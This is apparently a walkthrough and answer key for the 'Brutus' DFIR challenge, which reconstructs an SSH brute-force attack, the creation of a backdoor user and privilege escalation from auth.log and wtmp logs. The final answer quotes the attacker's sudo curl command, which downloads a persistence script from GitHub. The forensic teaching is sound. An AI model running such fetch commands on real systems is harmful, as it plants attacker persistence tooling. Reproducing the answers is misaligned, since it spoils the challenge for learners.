Introduction to Brutus Challange

I want to share some tips for approaching the Brutus challenge.

Sherlock Scenario on Brutus

In this very easy Sherlock, you will familiarize yourself with Unix auth.log and wtmp logs. We'll explore a scenario where a Confluence server was brute-forced via its SSH service. After gaining access to the server, the attacker performed additional activities, which we can track using auth.log. Although auth.log is primarily used for brute-force analysis, we will delve into the full potential of this artifact in our investigation, including aspects of privilege escalation, persistence, and even some visibility into command execution.

Brutus is an entry-level DFIR challenge with two artifacts: auth.log and wtmp. The goal is to trace an SSH brute-force attack where the attacker cracks the root password.

The attacker then reconnects, creates a new user, adds it to the sudo group, and uses it to execute commands with elevated privileges.

Tools that are used in this Brutus Sherlock challenge

• utmpdump is a command-line tool for Unix-like systems that helps you view login and logout records stored in files like /var/run/utmp (current logins) and /var/log/wtmp (historical logins). It converts the binary data in these files into a human-readable format, making it easy to see who’s logged in, when, and from where. With simple commands like utmpdump /var/run/utmp for current logins or utmpdump -r /var/log/wtmp you can audit user activity, troubleshoot issues, or investigate security incidents for historical records. It’s a must-have tool for system administrators and security professionals!
• Text Editor which is used to read the auth.log which might contain useful information such as timestamp

The screenshot above shows the content of the auth.log file

Question Answers

Analyzing the auth.log, can you identify the IP address used by the attacker to carry out a brute force attack?

Answer: 65.2.161.68

The brute force attempts were successful, and the attacker gained access to an account on the server. What is the username of this account?

Answer: root

Can you identify the timestamp when the attacker manually logged in to the server to carry out their objectives?

Answer: 2024-03-06 06:32:45

SSH login sessions are tracked and assigned a session number upon login. What is the session number assigned to the attacker’s session for the user account from Question 2?

Answer: 37

The attacker added a new user as part of their persistence strategy on the server and gave this new user account higher privileges. What is the name of this account?

Answer: cyberjunkie

What is the MITRE ATT&CK sub-technique ID used for persistence?

Source: Mitre and Attack Matrix

Answer: T1136.001

How long did the attacker’s first SSH session last based on the previously confirmed authentication time and session ending within the auth.log? (seconds)

The total session duration was from 06:32:45 to 06:37:24, spanning 279 seconds

Answer: 279

The attacker logged into their backdoor account and utilized their higher privileges to download a script. What is the full command executed using sudo?

Answer: /usr/bin/curl https://raw.githubusercontent.com/montysecurity/linper/main/linper.sh